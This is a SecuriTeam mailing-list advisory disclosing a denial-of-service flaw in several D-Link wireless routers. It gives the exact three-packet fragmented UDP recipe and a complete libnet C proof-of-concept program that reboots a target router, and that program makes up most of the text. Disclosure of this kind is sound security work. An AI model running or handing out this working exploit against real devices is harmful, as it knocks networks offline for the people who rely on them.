[NEWS] D-Link Fragmented UDP Denial of Service Vulnerability

The following security advisory is sent to the securiteam mailing list, and can be found at the SecuriTeam web site: http://www.securiteam.com
- - promotion

The SecuriTeam alerts list - Free, Accurate, Independent.

Get your security news from a reliable source.
http://www.securiteam.com/mailinglist.html

- - - - - - - - -



D-Link Fragmented UDP Denial of Service Vulnerability
------------------------------------------------------------------------


SUMMARY

Remote exploitation of a design error flaw in multiple D-Link wireless
access points could allow attackers to create a denial of service
condition on the affected machine and therefore the wired and wireless
networks themselves.

DETAILS

Vulnerable Systems:
* D-Link DI-524 Wireless Router, firmware 3.20 August 18, 2005
* D-Link DI-624 Wireless Router
* D-Link DI-784

Immune Systems:
* D-Link DI-614+ Wireless Router
* D-Link DI-604 Ethernet Broadband Router

Successful exploitation of the described vulnerability allows remote
attackers to reboot the target router. Exploitation will occur given that
the attacker send 3 successive fragmented UDP packets with the following
specifications:

All packets must have the same Identification Number in the IP Header.

Packet 1:
The MORE_FRAGMENTS flag must be set to 1. (value IP_MF)
The fragmentation offset equal to 0.
The packet's payload size consists of 8 bytes. NULL bytes were tested in
the proof of concept.

Packet 2:
The MORE_FRAGMENTS flag set to 1. (value 0x2002)
The fragmentation offset equal to 16.
Payload is 8 bytes long.

Packet 3:
The MORE_FRAGMENTS flag set to 0. (value 0x0003)
The fragmentation offset equal to 24.
Payload is 8 bytes long.

In tests the affected routers would instantly terminate all current
connections. The DI-524 would take approximately one minute to then reboot
and restore a connections. The DI-624 would take approximately 30 seconds.

This vulnerability has been confirmed to work from at most 4 hops from the
intended target. Depending on how routers/switches and other hardware
placed between the attacker and the router further fragment or reassembly
the packets, the denial of service condition may not be triggered.

Exploit:
/*
*
* Aaron Portnoy
*
* silc.thunkers.net, thunkers
*
* D-Link Wireless Access Point
* Fragmented UDP DoS Proof of Concept
*
*
* gcc -o dlink_dos dlink_dos.c -lnet -Wall
*
*/

#include <libnet.h>

#define DEVICE "eth0"
#define SRC_IP "127.0.0.1"
#define DST_IP "127.0.0.1"
#define SRC_PRT 200
#define DST_PRT 11111

void usage (char *name)
{
fprintf (stderr,
"Usage: %s -s <source ip> -d <destination ip>\
-a <source port> -b <destination port>\n",
name);

exit (EXIT_FAILURE);
}

int gen_packet (char *device, char *pSRC, char *pDST, u_short sPRT,
u_short dPRT, int count)
{

libnet_t *l = NULL;
libnet_ptag_t udp = 0;
libnet_ptag_t ip = 0;

char errbuf[LIBNET_ERRBUF_SIZE];
char *payload = NULL;
u_short payload_s = 0, src_prt, dst_prt;
u_long src_ip, dst_ip;
int c, frag;

if (!device)
device = DEVICE;

l = libnet_init (LIBNET_RAW4, device, errbuf);

if (!l) {
fprintf (stderr, "libnet_init() failed: %s\n", errbuf);
exit (EXIT_FAILURE);
}

src_ip = pSRC ? libnet_name2addr4 (l, pSRC, LIBNET_RESOLVE) :
libnet_name2addr4 (l, SRC_IP, LIBNET_RESOLVE);

dst_ip = pDST ? libnet_name2addr4 (l, pDST, LIBNET_RESOLVE) :
libnet_name2addr4 (l, DST_IP, LIBNET_RESOLVE);

src_prt = sPRT ? sPRT : SRC_PRT;

dst_prt = dPRT ? dPRT : DST_PRT;

if (count == 1) {
payload = "\0\0\0\0\0\0\0\0";
payload_s = 8;
}

udp = libnet_build_udp (src_prt,
dst_prt,
(LIBNET_UDP_H + payload_s) * 2,
0, (unsigned char *)payload, payload_s, l,
udp);

if (udp == -1) {
fprintf (stderr, "Can't build UDP header: %s\n", libnet_geterror
(l));
exit (EXIT_FAILURE);
}

switch (count) {

case 1:
frag = IP_MF;
break;

case 2:
frag = 0x2002;
break;

case 3:
frag = 0x0003;
break;
}

ip = libnet_build_ipv4 (20,
0,
1800,
frag,
128,
IPPROTO_UDP, 0, src_ip, dst_ip, NULL, 0, l,
ip);

if (ip == -1) {
fprintf (stderr, "Can't build IP header: %s\n", libnet_geterror
(l));
exit (EXIT_FAILURE);
}

c = libnet_write (l);

if (c == -1) {
fprintf (stderr, "Write error: %s\n", libnet_geterror (l));
exit (EXIT_FAILURE);
}

printf ("Wrote UDP packet; check the wire.\n");

libnet_destroy (l);

return (EXIT_SUCCESS);

}

int main (int argc, char **argv)
{

int i;
char *pDST, *pSRC, *device;
u_short dPRT = 0;
u_short sPRT = 0;

pDST = pSRC = device = NULL;

while ((i = getopt (argc, argv, "D:d:s:a:b:h")) != EOF) {
switch (i) {
case 'D':
device = optarg;
break;
case 'd':
pDST = optarg;
break;
case 's':
pSRC = optarg;
break;
case 'a':
sPRT = atoi (optarg);
break;
case 'b':
dPRT = atoi (optarg);
break;
case 'h':
usage (argv[0]);
break;
}
}

printf ("\n----------------------------------\n");
printf (" -= D-Link DoS PoC =-\n");
printf (" Aaron Portnoy\n");
printf (" deft () thunkers ! net \n");
printf (" silc.thunkers.net, thunkers\n");
printf ("----------------------------------\n");

device ? printf ("\nDevice: \t%s\n", device) :
printf ("\nDevice: \t%s\n", DEVICE);

pSRC ? printf ("SRC IP: \t%s\n", pSRC) :
printf ("SRC IP: \t%s\n", SRC_IP);

pDST ? printf ("DST IP: \t%s\n", pDST) :
printf ("DST IP: \t%s\n", DST_IP);

sPRT ? printf ("SPort: \t\t%d\n", sPRT) :
printf ("SPort: \t\t%d\n", SRC_PRT);

dPRT ? printf ("DPort: \t\t%d\n\n", dPRT) :
printf ("DPort: \t\t%d\n\n", DST_PRT);

for (i = 1; i <= 3; i++)
gen_packet (device, pSRC, pDST, sPRT, dPRT, i);
printf ("\n");

return (EXIT_SUCCESS);
}
/* EoF */


ADDITIONAL INFORMATION

The information has been provided by <mailto:deft@xxxxxxxxxxxx> Aaron
Portnoy.
The original article can be found at:
<http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt>
http://www.thunkers.net/~deft/advisories/dlink_udp_dos.txt



========================================


This bulletin is sent to members of the SecuriTeam mailing list.
To unsubscribe from the list, send mail with an empty subject line and body to: list-unsubscribe@xxxxxxxxxxxxxx
In order to subscribe to the mailing list, simply forward this email to: list-subscribe@xxxxxxxxxxxxxx


====================
====================

DISCLAIMER:
The information in this bulletin is provided "AS IS" without warranty of any kind.
In no event shall we be liable for any damages whatsoever including direct, indirect, incidental, consequential, loss of business profits or special damages.

Relevant Pages